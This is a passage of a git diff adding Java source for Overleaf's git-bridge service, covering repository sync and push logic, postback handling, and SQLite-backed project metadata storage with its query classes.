+ */ + public void startBackgroundJobs() { + swapJob.start(); + gcJob.start(); + } + + public boolean healthCheck() { + try { + dbStore.getNumProjects(); + File rootDirectory = new File("/"); + if (!rootDirectory.exists()) { + throw new Exception("bad filesystem state, root directory does not exist"); + } + Log.debug("[HealthCheck] passed"); + return true; + } catch (Exception e) { + Log.error("[HealthCheck] FAILED!", e); + return false; + } + } + + /* + * Performs a check of inconsistencies in the DB. This was used to upgrade + * the schema. + */ + public void checkDB() { + Log.info("Checking DB"); + File rootDir = repoStore.getRootDirectory(); + for (File f : rootDir.listFiles()) { + if (f.getName().equals(".wlgb")) { + continue; + } + String projName = f.getName(); + try (LockGuard __ = lock.lockGuard(projName)) { + File dotGit = new File(f, ".git"); + if (!dotGit.exists()) { + Log.warn("Project: {} has no .git", projName); + continue; + } + ProjectState state = dbStore.getProjectState(projName); + if (state != ProjectState.NOT_PRESENT) { + continue; + } + Log.warn("Project: {} not in swap_store, adding", projName); + dbStore.setLastAccessedTime(projName, new Timestamp(dotGit.lastModified())); + } catch (CannotAcquireLockException e) { + throw new RuntimeException(e); + } + } + } + + /* + * Synchronises the given repository with Overleaf. + * + * It acquires the project lock and calls + * {@link #getUpdatedRepoCritical(Optional, String, GetDocResult)}. + * @param oauth2 The oauth2 to use + * @param projectName The name of the project + * @throws IOException + * @throws GitUserException + */ + public ProjectRepo getUpdatedRepo(Optional<Credential> oauth2, String projectName) + throws IOException, GitUserException, CannotAcquireLockException { + try (LockGuard __ = lock.lockGuard(projectName)) { + Optional<GetDocResult> maybeDoc = snapshotAPI.getDoc(oauth2, projectName); + if (!maybeDoc.isPresent()) { + throw new RepositoryNotFoundException(projectName); + } + GetDocResult doc = maybeDoc.get(); + Log.debug("[{}] Updating repository", projectName); + return getUpdatedRepoCritical(oauth2, projectName, doc); + } + } + + /* + * Synchronises the given repository with Overleaf. + * + * Pre: the project lock must be acquired for the given repo. + * + * 1. Queries the project state for the given project name. + * a. NOT_PRESENT = We've never seen it before, and the row for the + * project doesn't even exist. The project definitely + * exists because we would have aborted otherwise. + * b. PRESENT = The project is on disk. + * c. SWAPPED = The project is in the {@link SwapStore} + * + * If the project has never been cloned, it is git init'd. If the project + * is in swap, it is restored to disk. Otherwise, the project was already + * present. + * + * With the project present, snapshots are downloaded from the snapshot + * API with {@link #updateProject(Optional, ProjectRepo)}. + * + * Then, the last accessed time of the project is set to the current time. + * This is to support the LRU of the swap store. 
+ * @param oauth2 + * @param projectName The name of the project + * @throws IOException + * @throws GitUserException + */ + private ProjectRepo getUpdatedRepoCritical( + Optional<Credential> oauth2, String projectName, GetDocResult doc) + throws IOException, GitUserException { + ProjectRepo repo; + ProjectState state = dbStore.getProjectState(projectName); + switch (state) { + case NOT_PRESENT: + Log.info("[{}] Repo not present", projectName); + repo = repoStore.initRepo(projectName); + break; + case SWAPPED: + swapJob.restore(projectName); + repo = repoStore.getExistingRepo(projectName); + break; + default: + repo = repoStore.getExistingRepo(projectName); + } + updateProject(oauth2, repo); + dbStore.setLastAccessedTime(projectName, Timestamp.valueOf(LocalDateTime.now())); + return repo; + } + + /* + * The public call to push a project. + * + * It acquires the lock and calls {@link #pushCritical( + * Optional, + * String, + * RawDirectory, + * RawDirectory + * )}, catching exceptions, logging, and rethrowing them. + * @param oauth2 The oauth2 to use for the snapshot API + * @param projectName The name of the project to push to + * @param directoryContents The new contents of the project + * @param oldDirectoryContents The old contents of the project + * @param hostname + * @throws SnapshotPostException + * @throws IOException + * @throws MissingRepositoryException + * @throws ForbiddenException + * @throws GitUserException + */ + public void push( + Optional<Credential> oauth2, + String projectName, + RawDirectory directoryContents, + RawDirectory oldDirectoryContents, + String hostname) + throws SnapshotPostException, + IOException, + MissingRepositoryException, + ForbiddenException, + GitUserException, + CannotAcquireLockException { + Log.debug("[{}] pushing to Overleaf", projectName); + try (LockGuard __ = lock.lockGuard(projectName)) { + Log.info("[{}] got project lock", projectName); + pushCritical(oauth2, projectName, directoryContents, oldDirectoryContents); + } catch (SevereSnapshotPostException e) { + Log.warn("[" + projectName + "] Failed to put to Overleaf", e); + throw e; + } catch (SnapshotPostException e) { + /* Stack trace should be printed further up */ + Log.warn( + "[{}] Exception when waiting for postback: {}", + projectName, + e.getClass().getSimpleName()); + throw e; + } catch (IOException e) { + Log.warn("[{}] IOException on put: {}", projectName, e); + throw e; + } + + gcJob.queueForGc(projectName); + } + + /* + * Does the work of pushing to a project, assuming the project lock is held. + * The {@link WriteLatexPutHook} is the original caller, and when we return + * without throwing, the commit is committed. + * + * We start off by creating a postback key, which is given in the url when + * the Overleaf app tries to access the atts. + * + * Then creates a {@link CandidateSnapshot} from the old and new project + * contents. The + * {@link CandidateSnapshot} is created using + * {@link #createCandidateSnapshot(String, RawDirectory, RawDirectory)}, + * which creates the snapshot object and writes the push files to the + * atts directory, which is served by the {@link PostbackHandler}. + * The files are deleted at the end of a try-with-resources block. + * + * Then 3 things are used to make the push request to the snapshot API: + * 1. The oauth2 + * 2. The candidate snapshot + * 3. The postback key + * + * If the snapshot API reports this as not successful, we immediately throw + * an {@link OutOfDateException}, which goes back to the user. 
+ * + * Otherwise, we wait (with a timeout) on a promise from the postback + * manager, which can throw back to the user. + * + * If this is successful, we approve the snapshot with + * {@link #approveSnapshot(int, CandidateSnapshot)}, which updates our side + * of the push: the latest version and the URL index store. + * + * Then, we set the last accessed time for the swap store. + * + * Finally, after we return, the push to the repo from the hook is + * successful and the repo gets updated. + * + * @param oauth2 + * @param projectName + * @param directoryContents + * @param oldDirectoryContents + * @throws IOException + * @throws MissingRepositoryException + * @throws ForbiddenException + * @throws SnapshotPostException + * @throws GitUserException + */ + private void pushCritical( + Optional<Credential> oauth2, + String projectName, + RawDirectory directoryContents, + RawDirectory oldDirectoryContents) + throws IOException, + MissingRepositoryException, + ForbiddenException, + SnapshotPostException, + GitUserException { + Optional<Long> maxFileNum = config.getRepoStore().flatMap(RepoStoreConfig::getMaxFileNum); + if (maxFileNum.isPresent()) { + long maxFileNum_ = maxFileNum.get(); + if (directoryContents.getFileTable().size() > maxFileNum_) { + Log.warn( + "[{}] Too many files: {}/{}", + projectName, + directoryContents.getFileTable().size(), + maxFileNum_); + throw new FileLimitExceededException(directoryContents.getFileTable().size(), maxFileNum_); + } + } + Log.debug( + "[{}] Pushing files ({} new, {} old)", + projectName, + directoryContents.getFileTable().size(), + oldDirectoryContents.getFileTable().size()); + String postbackKey = postbackManager.makeKeyForProject(projectName); + Log.debug("[{}] Created postback key: {}", projectName, postbackKey); + try (CandidateSnapshot candidate = + createCandidateSnapshot(projectName, directoryContents, oldDirectoryContents); ) { + Log.debug("[{}] Candidate snapshot created: {}", projectName, candidate); + PushResult result = snapshotAPI.push(oauth2, candidate, postbackKey); + if (result.wasSuccessful()) { + Log.debug("[{}] Push to Overleaf successful", projectName); + Log.debug("[{}] Waiting for postback...", projectName); + int versionID = postbackManager.waitForVersionIdOrThrow(projectName); + Log.debug("[{}] Got version ID for push: {}", projectName, versionID); + approveSnapshot(versionID, candidate); + Log.debug("[{}] Approved version ID: {}", projectName, versionID); + dbStore.setLastAccessedTime(projectName, Timestamp.valueOf(LocalDateTime.now())); + } else { + Log.warn("[{}] Went out of date while waiting for push", projectName); + throw new OutOfDateException(); + } + } + } + + /* + * A public call that should originate from the {@link FileHandler}. + * + * The {@link FileHandler} serves atts to the Overleaf app during a push. + * The Overleaf app includes the postback key in the request, which was + * originally given on a push request. + * + * This method checks that the postback key matches, and throws if not. + * + * The FileHandler should not serve the file if this throws. + * @param projectName The project name that this key belongs to + * @param postbackKey The key + * @throws InvalidPostbackKeyException If the key doesn't match + */ + public void checkPostbackKey(String projectName, String postbackKey) + throws InvalidPostbackKeyException { + postbackManager.checkPostbackKey(projectName, postbackKey); + } + + /* + * A public call that originates from the postback thread + * {@link PostbackContents#processPostback()}, i.e. 
once the Overleaf app + * has fetched all the atts and has committed the push and is happy, it + * calls back here, fulfilling the promise that the push + * {@link #push(Optional, String, RawDirectory, RawDirectory, String)} + * is waiting on. + * + * The Overleaf app will have invented a new version for the push, which is + * passed to the promise for the original push request to update the app. + * @param projectName The name of the project being pushed to + * @param postbackKey The postback key being used + * @param versionID the new version id to use + * @throws UnexpectedPostbackException if the postback key is invalid + */ + public void postbackReceivedSuccessfully(String projectName, String postbackKey, int versionID) + throws UnexpectedPostbackException { + Log.debug( + "[{}]" + " Postback received by postback thread, version: {}", projectName, versionID); + postbackManager.postVersionIDForProject(projectName, versionID, postbackKey); + } + + /* + * As with {@link #postbackReceivedSuccessfully(String, String, int)}, + * but with an exception instead. + * + * This is based on the JSON body of the postback from the Overleaf app. + * + * The most likely problem is an {@link OutOfDateException}. + * @param projectName The name of the project + * @param postbackKey The postback key being used + * @param exception The exception encountered + * @throws UnexpectedPostbackException If the postback key is invalid + */ + public void postbackReceivedWithException( + String projectName, String postbackKey, SnapshotPostException exception) + throws UnexpectedPostbackException { + Log.warn("[{}] Postback received with exception", projectName); + postbackManager.postExceptionForProject(projectName, exception, postbackKey); + } + + /* + * Delete a project's data + */ + public void deleteProject(String projectName) { + Log.info("[{}] deleting project", projectName); + dbStore.deleteProject(projectName); + try { + repoStore.remove(projectName); + } catch (IOException e) { + Log.warn("Failed to delete repository for project {}: {}", projectName, e); + } + swapStore.remove(projectName); + } + + /* PRIVATE */ + + /* + * Called by {@link #getUpdatedRepoCritical(Optional, String)} + * + * Does the actual work of getting the snapshots for a project from the + * snapshot API and committing them to a repo. + * + * If any snapshots were found, sets the latest version for the project. + * + * @param oauth2 + * @param repo + * @throws IOException + * @throws GitUserException + */ + private void updateProject(Optional<Credential> oauth2, ProjectRepo repo) + throws IOException, GitUserException { + String projectName = repo.getProjectName(); + int latestVersionId = dbStore.getLatestVersionForProject(projectName); + Deque<Snapshot> snapshots = snapshotAPI.getSnapshots(oauth2, projectName, latestVersionId); + + makeCommitsFromSnapshots(repo, snapshots); + + // TODO: in case crashes around here, add an + // "updating_from_commit" column to the DB as a way to rollback the + // any failed partial updates before re-trying + // Also need to consider the empty state (a new git init'd repo being + // the rollback target) + if (!snapshots.isEmpty()) { + dbStore.setLatestVersionForProject(projectName, snapshots.getLast().getVersionID()); + } + } + + /* + * Called by {@link #updateProject(Optional, ProjectRepo)}. + * + * Performs the actual Git commits on the disk. 
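+ *
+ * Before committing, each file's size is checked against the configured
+ * repoStore.maxFileSize; a file at or over the limit aborts the update with a
+ * {@link SizeLimitExceededException}.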
+ * + * Each commit adds files to the db store + * ({@link ResourceCache#get(String, String, String, Map, Map, Optional)}, + * and then removes any files that were deleted. + * @param repo The repository to commit to + * @param snapshots The snapshots to commit + * @throws IOException If an IOException occurred + * @throws SizeLimitExceededException If one of the files was too big. + */ + private void makeCommitsFromSnapshots(ProjectRepo repo, Collection<Snapshot> snapshots) + throws IOException, GitUserException { + String name = repo.getProjectName(); + Optional<Long> maxSize = config.getRepoStore().flatMap(RepoStoreConfig::getMaxFileSize); + for (Snapshot snapshot : snapshots) { + RawDirectory directory = repo.getDirectory(); + Map<String, RawFile> fileTable = directory.getFileTable(); + List<RawFile> files = new ArrayList<>(); + files.addAll(snapshot.getSrcs()); + for (RawFile file : files) { + long size = file.size(); + /* Can't throw in ifPresent... */ + if (maxSize.isPresent()) { + long maxSize_ = maxSize.get(); + if (size >= maxSize_) { + throw new SizeLimitExceededException(Optional.of(file.getPath()), size, maxSize_); + } + } + } + Map<String, byte[]> fetchedUrls = new HashMap<>(); + for (SnapshotAttachment snapshotAttachment : snapshot.getAtts()) { + files.add( + resourceCache.get( + name, + snapshotAttachment.getUrl(), + snapshotAttachment.getPath(), + fileTable, + fetchedUrls, + maxSize)); + } + Log.debug("[{}] Committing version ID: {}", name, snapshot.getVersionID()); + Collection<String> missingFiles = + repo.commitAndGetMissing( + new GitDirectoryContents(files, repoStore.getRootDirectory(), name, snapshot)); + dbStore.deleteFilesForProject(name, missingFiles.toArray(new String[missingFiles.size()])); + } + } + + /* + * Called by + * {@link #pushCritical(Optional, String, RawDirectory, RawDirectory)}. + * + * This call consists of 2 things: Creating the candidate snapshot, + * and writing the atts to the atts directory. + * + * The candidate snapshot RAIIs away those atts (use try-with-resources). + * @param projectName The name of the project + * @param directoryContents The new directory contents + * @param oldDirectoryContents The old directory contents + * @return The {@link CandidateSnapshot} created + * @throws IOException If an I/O exception occurred on writing + */ + private CandidateSnapshot createCandidateSnapshot( + String projectName, RawDirectory directoryContents, RawDirectory oldDirectoryContents) + throws IOException { + CandidateSnapshot candidateSnapshot = + new CandidateSnapshot( + projectName, + dbStore.getLatestVersionForProject(projectName), + directoryContents, + oldDirectoryContents); + candidateSnapshot.writeServletFiles(repoStore.getRootDirectory()); + return candidateSnapshot; + } + + /* + * Called by + * {@link #pushCritical(Optional, String, RawDirectory, RawDirectory)}. + * + * This method approves a push by setting the latest version and removing + * any deleted files from the db store (files were already added by the + * resources cache). 
+ * @param versionID + * @param candidateSnapshot + */ + private void approveSnapshot(int versionID, CandidateSnapshot candidateSnapshot) { + List<String> deleted = candidateSnapshot.getDeleted(); + dbStore.setLatestVersionForProject(candidateSnapshot.getProjectName(), versionID); + dbStore.deleteFilesForProject( + candidateSnapshot.getProjectName(), deleted.toArray(new String[deleted.size()])); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBInitException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBInitException.java new file mode 100644 index 0000000..633ae51 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBInitException.java @@ -0,0 +1,19 @@ +package uk.ac.ic.wlgitbridge.bridge.db; + +/* + * Created by winston on 23/08/2016. + */ +public class DBInitException extends RuntimeException { + + public DBInitException(String message) { + super(message); + } + + public DBInitException(String message, Throwable cause) { + super(message, cause); + } + + public DBInitException(Throwable cause) { + super(cause); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBStore.java new file mode 100644 index 0000000..01f3777 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBStore.java @@ -0,0 +1,48 @@ +package uk.ac.ic.wlgitbridge.bridge.db; + +import java.sql.Timestamp; +import java.util.List; + +/* + * Created by winston on 20/08/2016. + */ +public interface DBStore { + + int getNumProjects(); + + List<String> getProjectNames(); + + void setLatestVersionForProject(String project, int versionID); + + int getLatestVersionForProject(String project); + + void addURLIndexForProject(String projectName, String url, String path); + + void deleteFilesForProject(String project, String... files); + + String getPathForURLInProject(String projectName, String url); + + String getOldestUnswappedProject(); + + void swap(String projectName, String compressionMethod); + + void restore(String projectName); + + String getSwapCompression(String projectName); + + int getNumUnswappedProjects(); + + ProjectState getProjectState(String projectName); + + /* + * Sets the last accessed time for the given project name. + * @param projectName the project's name + * @param time the time, or null if the project is to be swapped + */ + void setLastAccessedTime(String projectName, Timestamp time); + + /* + * Delete the metadata associated with the given project. + */ + void deleteProject(String projectName); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/ProjectState.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/ProjectState.java new file mode 100644 index 0000000..3e85116 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/ProjectState.java @@ -0,0 +1,10 @@ +package uk.ac.ic.wlgitbridge.bridge.db; + +/* + * Created by winston on 24/08/2016. 
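+ *
+ * The three states a project can be in, as recorded in the DB store:
+ * NOT_PRESENT means we have never seen the project (no row exists yet),
+ * PRESENT means the repo is on disk, and SWAPPED means it has been archived
+ * to the swap store and must be restored before use.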
+ */ +public enum ProjectState { + NOT_PRESENT, + PRESENT, + SWAPPED +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/noop/NoopDbStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/noop/NoopDbStore.java new file mode 100644 index 0000000..20d4202 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/noop/NoopDbStore.java @@ -0,0 +1,70 @@ +package uk.ac.ic.wlgitbridge.bridge.db.noop; + +import java.sql.Timestamp; +import java.util.List; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; + +public class NoopDbStore implements DBStore { + + @Override + public int getNumProjects() { + return 0; + } + + @Override + public List<String> getProjectNames() { + return null; + } + + @Override + public void setLatestVersionForProject(String project, int versionID) {} + + @Override + public int getLatestVersionForProject(String project) { + return 0; + } + + @Override + public void addURLIndexForProject(String projectName, String url, String path) {} + + @Override + public void deleteFilesForProject(String project, String... files) {} + + @Override + public String getPathForURLInProject(String projectName, String url) { + return null; + } + + @Override + public String getOldestUnswappedProject() { + return null; + } + + @Override + public int getNumUnswappedProjects() { + return 0; + } + + @Override + public ProjectState getProjectState(String projectName) { + return null; + } + + @Override + public void setLastAccessedTime(String projectName, Timestamp time) {} + + @Override + public void swap(String projectName, String compressionMethod) {} + + @Override + public void restore(String projectName) {} + + @Override + public String getSwapCompression(String projectName) { + return null; + } + + @Override + public void deleteProject(String projectName) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLQuery.java new file mode 100644 index 0000000..faa6a3f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLQuery.java @@ -0,0 +1,12 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import java.sql.ResultSet; +import java.sql.SQLException; + +/* + * Created by Winston on 20/11/14. + */ +public interface SQLQuery<T> extends SQLUpdate { + + public T processResultSet(ResultSet resultSet) throws SQLException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLUpdate.java new file mode 100644 index 0000000..9e79fdc --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLUpdate.java @@ -0,0 +1,14 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import java.sql.PreparedStatement; +import java.sql.SQLException; + +/* + * Created by Winston on 20/11/14. 
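+ *
+ * A minimal illustrative implementation (the table and column names here
+ * are only an example, not part of the contract):
+ * <pre>{@code
+ * class TouchProject implements SQLUpdate {
+ *   private final String name;
+ *   TouchProject(String name) { this.name = name; }
+ *   public String getSQL() {
+ *     return "UPDATE `projects` SET `last_accessed` = DATETIME('now') WHERE `name` = ?";
+ *   }
+ *   public void addParametersToStatement(PreparedStatement statement) throws SQLException {
+ *     statement.setString(1, name);
+ *   }
+ * }
+ * }</pre>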
+ */ +public interface SQLUpdate { + + String getSQL(); + + default void addParametersToStatement(PreparedStatement statement) throws SQLException {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStore.java new file mode 100644 index 0000000..6647a59 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStore.java @@ -0,0 +1,227 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import com.google.common.base.Preconditions; +import java.io.File; +import java.sql.*; +import java.util.List; +import java.util.stream.Stream; +import uk.ac.ic.wlgitbridge.bridge.db.DBInitException; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.query.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert.*; + +/* + * Created by Winston on 17/11/14. + */ +public class SqliteDBStore implements DBStore { + + private final Connection connection; + private int heapLimitBytes = 0; + + public SqliteDBStore(File dbFile) { + this(dbFile, 0); + } + + public SqliteDBStore(File dbFile, int heapLimitBytes) { + this.heapLimitBytes = heapLimitBytes; + try { + connection = openConnectionTo(dbFile); + createTables(); + } catch (Throwable t) { + throw new DBInitException(t); + } + } + + @Override + public int getNumProjects() { + return query(new GetNumProjects()); + } + + @Override + public List<String> getProjectNames() { + return query(new GetProjectNamesSQLQuery()); + } + + @Override + public void setLatestVersionForProject(String projectName, int versionID) { + update(new SetProjectSQLUpdate(projectName, versionID)); + } + + @Override + public int getLatestVersionForProject(String projectName) { + return query(new GetLatestVersionForProjectSQLQuery(projectName)); + } + + @Override + public void addURLIndexForProject(String projectName, String url, String path) { + update(new AddURLIndexSQLUpdate(projectName, url, path)); + } + + @Override + public void deleteFilesForProject(String projectName, String... 
paths) { + update(new DeleteFilesForProjectSQLUpdate(projectName, paths)); + } + + @Override + public String getPathForURLInProject(String projectName, String url) { + return query(new GetPathForURLInProjectSQLQuery(projectName, url)); + } + + @Override + public String getOldestUnswappedProject() { + return query(new GetOldestProjectName()); + } + + @Override + public int getNumUnswappedProjects() { + return query(new GetNumUnswappedProjects()); + } + + @Override + public ProjectState getProjectState(String projectName) { + return query(new GetProjectState(projectName)); + } + + @Override + public void setLastAccessedTime(String projectName, Timestamp lastAccessed) { + update(new SetProjectLastAccessedTime(projectName, lastAccessed)); + } + + @Override + public void swap(String projectName, String compressionMethod) { + update(new UpdateSwap(projectName, compressionMethod)); + } + + @Override + public void restore(String projectName) { + update(new UpdateRestore(projectName)); + } + + @Override + public String getSwapCompression(String projectName) { + return query(new GetSwapCompression(projectName)); + } + + @Override + public void deleteProject(String projectName) { + update(new DeleteAllFilesInProjectSQLUpdate(projectName)); + update(new DeleteProjectSQLUpdate(projectName)); + } + + private Connection openConnectionTo(File dbFile) { + File parentDir = dbFile.getParentFile(); + if (!parentDir.exists() && !parentDir.mkdirs()) { + throw new DBInitException( + parentDir.getAbsolutePath() + + " directory didn't exist, " + + "and unable to create. Check your permissions."); + } + try { + Class.forName("org.sqlite.JDBC"); + } catch (ClassNotFoundException e) { + throw new DBInitException(e); + } + try { + return DriverManager.getConnection("jdbc:sqlite:" + dbFile.getAbsolutePath()); + } catch (SQLException e) { + throw new DBInitException("Unable to connect to DB", e); + } + } + + private void createTables() { + /* Migrations */ + /* We need to eat exceptions from here */ + try { + doUpdate(new SetSoftHeapLimitPragma(this.heapLimitBytes)); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddLastAccessed()); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddSwapTime()); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddRestoreTime()); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddSwapCompression()); + } catch (SQLException ignore) { + } + + /* Create tables (if they don't exist) */ + Stream.of( + new CreateProjectsTableSQLUpdate(), + new CreateProjectsIndexLastAccessed(), + new CreateURLIndexStoreSQLUpdate(), + new CreateIndexURLIndexStore()) + .forEach(this::update); + + /* In the case of needing to change the schema, we need to check that + migrations didn't just fail */ + Preconditions.checkState(query(new LastAccessedColumnExists())); + Preconditions.checkState(query(new SwapTimeColumnExists())); + Preconditions.checkState(query(new RestoreTimeColumnExists())); + Preconditions.checkState(query(new SwapCompressionColumnExists())); + } + + private void update(SQLUpdate update) { + try { + doUpdate(update); + } catch (SQLException e) { + throw new RuntimeException(e); + } + } + + private <T> T query(SQLQuery<T> query) { + try { + return doQuery(query); + } catch (SQLException e) { + throw new RuntimeException(e); + } + } + + private void doUpdate(SQLUpdate update) throws SQLException { + PreparedStatement statement = null; + try { + statement = connection.prepareStatement(update.getSQL()); + 
update.addParametersToStatement(statement); + statement.executeUpdate(); + } catch (SQLException e) { + throw e; + } finally { + try { + statement.close(); + } catch (Throwable t) { + throw new SQLException(t); + } + } + } + + private <T> T doQuery(SQLQuery<T> query) throws SQLException { + PreparedStatement statement = null; + ResultSet results = null; + try { + statement = connection.prepareStatement(query.getSQL()); + query.addParametersToStatement(statement); + results = statement.executeQuery(); + return query.processResultSet(results); + } catch (SQLException e) { + throw e; + } finally { + if (statement != null) { + statement.close(); + } + if (results != null) { + results.close(); + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetLatestVersionForProjectSQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetLatestVersionForProjectSQLQuery.java new file mode 100644 index 0000000..cc74e77 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetLatestVersionForProjectSQLQuery.java @@ -0,0 +1,40 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by Winston on 20/11/14. + */ +public class GetLatestVersionForProjectSQLQuery implements SQLQuery<Integer> { + + private static final String GET_VERSION_IDS_FOR_PROJECT_NAME = + "SELECT `version_id` FROM `projects` WHERE `name` = ?"; + + private final String projectName; + + public GetLatestVersionForProjectSQLQuery(String projectName) { + this.projectName = projectName; + } + + @Override + public Integer processResultSet(ResultSet resultSet) throws SQLException { + int versionID = 0; + while (resultSet.next()) { + versionID = resultSet.getInt("version_id"); + } + return versionID; + } + + @Override + public String getSQL() { + return GET_VERSION_IDS_FOR_PROJECT_NAME; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumProjects.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumProjects.java new file mode 100644 index 0000000..30e00be --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumProjects.java @@ -0,0 +1,26 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 24/08/2016. 
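+ *
+ * Note: the SQLite JDBC driver labels an unaliased aggregate column with
+ * the expression text itself, which is why processResultSet reads the
+ * count back as "COUNT(*)".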
+ */ +public class GetNumProjects implements SQLQuery<Integer> { + + private static final String GET_NUM_PROJECTS = "SELECT COUNT(*)\n" + " FROM `projects`"; + + @Override + public String getSQL() { + return GET_NUM_PROJECTS; + } + + @Override + public Integer processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + return resultSet.getInt("COUNT(*)"); + } + throw new IllegalStateException("Count always returns results"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumUnswappedProjects.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumUnswappedProjects.java new file mode 100644 index 0000000..512f15c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumUnswappedProjects.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 24/08/2016. + */ +public class GetNumUnswappedProjects implements SQLQuery<Integer> { + + private static final String GET_NUM_UNSWAPPED_PROJECTS = + "SELECT COUNT(*)\n" + " FROM `projects`\n" + " WHERE `last_accessed` IS NOT NULL"; + + @Override + public String getSQL() { + return GET_NUM_UNSWAPPED_PROJECTS; + } + + @Override + public Integer processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + return resultSet.getInt("COUNT(*)"); + } + throw new IllegalStateException("Count always returns results"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetOldestProjectName.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetOldestProjectName.java new file mode 100644 index 0000000..3518977 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetOldestProjectName.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 23/08/2016. + */ +public class GetOldestProjectName implements SQLQuery<String> { + + private static final String GET_OLDEST_PROJECT_NAME = + "SELECT `name`, MIN(`last_accessed`)\n" + + " FROM `projects` \n" + + " WHERE `last_accessed` IS NOT NULL;"; + + @Override + public String getSQL() { + return GET_OLDEST_PROJECT_NAME; + } + + @Override + public String processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + return resultSet.getString("name"); + } + return null; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetPathForURLInProjectSQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetPathForURLInProjectSQLQuery.java new file mode 100644 